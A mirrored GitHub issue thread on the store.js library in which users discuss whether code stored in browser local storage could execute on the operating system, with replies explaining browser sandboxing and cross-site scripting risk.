Git Product home page Git Product logo

Comments (7)

karencho777 avatar karencho777 commented on June 15, 2024

so no one can answer?

from store.js.

AcidRaZor avatar AcidRaZor commented on June 15, 2024

Browsers can't execute EXE files due to security concerns, so storing a file in state won't work since JS is client-side, it's quite impossible to execute a file or anything that can interact with the core OS (the container would be the browser who won't allow the interaction), and those hacks you've more than likely seen doesn't include malicious code execution from the browser itself, but normally exploits a vulnerability that allows them to use something else to execute their code remotely. This is the reason why Flash was discontinued as the vulnerabilities exploited within Flash components allowed to interact with the core OS, which allowed them to execute code within/through the Flash that was loaded on the site.

from store.js.

karencho777 avatar karencho777 commented on June 15, 2024

I just read about how they can store encoded code to local storage and then call out it... so if the stored code is in local storage when it will be executed from there will be interact with OS? and now can they store files with Flash?

from store.js.

AcidRaZor avatar AcidRaZor commented on June 15, 2024

Please share where you found this information?

Local storage cannot interact with the core OS and store.js doesn't use local storage, it uses state which is wiped every time you navigate off the website.

Browsers are "containerized" meaning each tab is in it's own isolated session, so can't interact with other browsers even. There's a LOT of security when it comes to the web.

Local storage is also isolated PER DOMAIN. So an attacker that wants to read sensitive information stored in local storage and send it to his own server (username/password or even credit card credentials or even try to embed encoded code) needs to first exploit your site through cross-site scripting attacks to test for vulnerabilities in your setup to inject their own JavaScript code in your website.

Even if they get that right, the only access they have is within the containerized environment of the browser and can only read the information, they cannot execute an exe that is stringified and embedded there either.

So if your site security sucks, then yes, they can store encoded code on local storage, but again, they're isolated from the OS.

Here's an article going over everything in detail: https://dev.to/rdegges/please-stop-using-local-storage-1i04

Also see the following answer if you don't believe me: https://security.stackexchange.com/a/95068

from store.js.

bjesuiter avatar bjesuiter commented on June 15, 2024

@AcidRaZor Thanks for your explanations. Can we somehow mark this issue as finished to improve Issue count?
I don't have rights to close the issue,
but i've seen that storeJS did not have any updates for 2 years on npm, so this looks like not very actively maintained currently.

from store.js.

bjesuiter avatar bjesuiter commented on June 15, 2024

@marcuswestin This issue can be closed.

Maybe the Readme should be extended by a part about security in Localstorage, so that users understand the implications.

I can recommend to link to this article for that: https://www.rdegges.com/2018/please-stop-using-local-storage/

Maybe I'll add a PR Later to add this to the Readme.

from store.js.

eddiemonge avatar eddiemonge commented on June 15, 2024

I wish people would stop using that article. Its mostly wrong. And doesn't address how to store things like JWT and other tokens (no, cookies is not a valid answer as XHR requests don't normally use cookies and JWT needs to be set in the header)

from store.js.

Related Issues (20)

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.